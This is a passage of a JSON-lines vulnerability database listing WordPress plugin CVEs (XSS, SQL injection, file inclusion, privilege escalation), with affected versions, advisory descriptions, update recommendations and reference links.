\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2784","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Hover Card widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc6fdb7c-b750-4f03-9785-a9dc7573580d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc6fdb7c-b750-4f03-9785-a9dc7573580d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12115","slug":"poll-maker","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202972\\\/poll-maker\\\/tags\\\/5.5.5\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php?old=3202972&old_path=poll-maker%2Ftags%2F5.5.4%2Fincludes%2Flists%2Fclass-poll-maker-polls-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202972\\\/poll-maker\\\/tags\\\/5.5.5\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php?old=3202972&old_path=poll-maker%2Ftags%2F5.5.4%2Fincludes%2Flists%2Fclass-poll-maker-polls-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e76447ec-2815-4758-ae2c-67a938a739d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e76447ec-2815-4758-ae2c-67a938a739d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13602","slug":"poll-maker","versionImpact":"5.5.3","versionEndExcluding":"5.5.4","description":"The Poll Maker  WordPress plugin before 5.5.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05d5010b-94eb-4fd3-b962-e2a16c032b71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05d5010b-94eb-4fd3-b962-e2a16c032b71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45810","slug":"email-subscribers","versionEndExcluding":"5.5.3","description":"Improper Neutralization of Formula Elements in a CSV File vulnerability in Icegram Icegram Express \u2013 Email Marketing, Newsletters and Automation for WordPress & WooCommerce.This issue affects Icegram Express \u2013 Email Marketing, Newsletters and Automation for WordPress & WooCommerce: from n\/a through 5.5.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-subscribers\\\/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/email-subscribers\\\/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3714","slug":"profilegrid-user-profiles-groups-and-communities","versionEndExcluding":"5.5.3","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'edit_group' handler in versions up to, and including, 5.5.2. This makes it possible for authenticated attackers, with group ownership, to update group options, including the 'associate_role' parameter, which defines the member's role. This issue was partially patched in version 5.5.2 preventing privilege escalation, however, it was fully patched in 5.5.3.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/public\\\/partials\\\/profile-magic-group.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/public\\\/partials\\\/profile-magic-group.php#L80\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939344\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/profile-magic-group.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939344\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/profile-magic-group.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4766651-92a6-42c9-81bc-7ea25350f561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4766651-92a6-42c9-81bc-7ea25350f561?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4485","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.2","versionEndExcluding":"5.5.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_custom_attributes\u2019 parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4890cd48-a448-4af1-ae1e-6456300434e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4890cd48-a448-4af1-ae1e-6456300434e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_button.php#L1538\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_button.php#L1538\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4484","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.1","versionEndExcluding":"5.5.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018xai_username\u2019 parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36c785f-9b8c-43c4-b12f-6fb4c0c67eff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36c785f-9b8c-43c4-b12f-6fb4c0c67eff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_meeting_scheduler.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.2\\\/modules\\\/widgets\\\/tp_meeting_scheduler.php#L549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12428","slug":"wp-data-access","versionImpact":"5.5.22","versionEndExcluding":"5.5.23","description":"The WP Data Access \u2013 App, Table, Form and Chart Builder plugin plugin for WordPress is vulnerable to SQL Injection via the 'order[user_login][dir]' parameter in all versions up to, and including, 5.5.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.5.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210150\\\/wp-data-access\\\/tags\\\/5.5.23\\\/WPDataAccess\\\/Data_Tables\\\/WPDA_Data_Tables.php?old=3206494&old_path=wp-data-access%2Ftags%2F5.5.22%2FWPDataAccess%2FData_Tables%2FWPDA_Data_Tables.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210150\\\/wp-data-access\\\/tags\\\/5.5.23\\\/WPDataAccess\\\/Data_Tables\\\/WPDA_Data_Tables.php?old=3206494&old_path=wp-data-access%2Ftags%2F5.5.22%2FWPDataAccess%2FData_Tables%2FWPDA_Data_Tables.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1708d6e-14f5-418f-81eb-f9269159b5b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1708d6e-14f5-418f-81eb-f9269159b5b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12743","slug":"mailpoet","versionImpact":"5.5.1","versionEndExcluding":"5.5.2","description":"The MailPoet  WordPress plugin before 5.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7945f52d-364d-438c-84f2-cf19b4250056\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7945f52d-364d-438c-84f2-cf19b4250056\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5209","slug":"add-search-to-menu","versionImpact":"5.5.9","versionEndExcluding":"5.5.10","description":"The Ivory Search  WordPress plugin before 5.5.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 5.5.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b51dc46-62c8-45b5-96ce-fb774b430388\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b51dc46-62c8-45b5-96ce-fb774b430388\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2785","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Age Gate widget in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076733%40the-plus-addons-for-elementor-page-builder&new=3076733%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076733%40the-plus-addons-for-elementor-page-builder&new=3076733%40the-plus-addons-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_age_gate.php?annotate=blame#L2389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_age_gate.php?annotate=blame#L2389\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0117436-7a2a-42f3-8c05-75dfddfb9d09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0117436-7a2a-42f3-8c05-75dfddfb9d09?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0445","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's element attributes in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-34373 is likely a duplicate of this issue.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_info_box.php#L2997\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_info_box.php#L2997\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_flip_box.php#L2388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_flip_box.php#L2388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.0\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_info_box.php#L2928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_info_box.php#L2928\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_flip_box.php#L2323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_flip_box.php#L2323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.3.4\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3199","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab15fe2b-974c-41b0-ab6b-68322d2d3396?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab15fe2b-974c-41b0-ab6b-68322d2d3396?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_countdown.php#L1781\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_countdown.php#L1781\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3197","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.2","versionEndExcluding":"5.5.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in the plugin's widgets in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af650c7a-c413-4f4a-9e4b-8ddcd8da5397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af650c7a-c413-4f4a-9e4b-8ddcd8da5397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3056776%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.4.2&new=3076733%40the-plus-addons-for-elementor-page-builder%2Ftags%2F5.5.0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13640","slug":"woocommerce-delivery-notes","versionImpact":"5.4.1","versionEndExcluding":"5.5.0","description":"The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.4.1 via the 'wcdn\/invoice' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/wcdn\/invoice directory which can contain invoice files if an email attachment setting is enabled.","recommendation":"Update to version 5.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-delivery-notes\\\/trunk\\\/includes\\\/class-wcdn-theme.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-delivery-notes\\\/trunk\\\/includes\\\/class-wcdn-theme.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250195\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250195\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ab3e54-a0b9-4420-ac90-f16e23688cca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ab3e54-a0b9-4420-ac90-f16e23688cca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49312","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.8.1","versionEndExcluding":"5.4.9","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution Echo RSS Feed Post Generator Plugin for WordPress allows Reflected XSS. This issue affects Echo RSS Feed Post Generator Plugin for WordPress: from n\/a through 5.4.8.1.","recommendation":"Update to version 5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/rss-feed-post-generator-echo\\\/vulnerability\\\/wordpress-echo-rss-feed-post-generator-plugin-for-wordpress-plugin-5-4-8-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/rss-feed-post-generator-echo\\\/vulnerability\\\/wordpress-echo-rss-feed-post-generator-plugin-for-wordpress-plugin-5-4-8-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4441","slug":"xml-sitemap-feed","versionImpact":"5.4.8","versionEndExcluding":"5.4.9","description":"The XML Sitemap & Google News plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.4.8 via the 'feed' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87888350-1230-4fec-9de2-c58fa24e6a05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87888350-1230-4fec-9de2-c58fa24e6a05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3082081%40xml-sitemap-feed&new=3082081%40xml-sitemap-feed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3082081%40xml-sitemap-feed&new=3082081%40xml-sitemap-feed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4391","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.8.1","versionEndExcluding":"5.4.8.2","description":"The Echo RSS Feed Post Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the echo_generate_featured_image() function in all versions up to, and including, 5.4.8.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.4.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72de9f64-f3e0-4705-adc1-6c22076b382f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72de9f64-f3e0-4705-adc1-6c22076b382f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9265","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Echo RSS Feed Post Generator plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.4.6. This is due to the plugin not properly restricting the roles that can set during registration through the echo_check_post_header_sent() function. This makes it possible for unauthenticated attackers to register as an administrator.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c099f401-4b05-4532-8e31-af1b1dea7eca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c099f401-4b05-4532-8e31-af1b1dea7eca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9874","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 5.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.4.7, or a newer patched 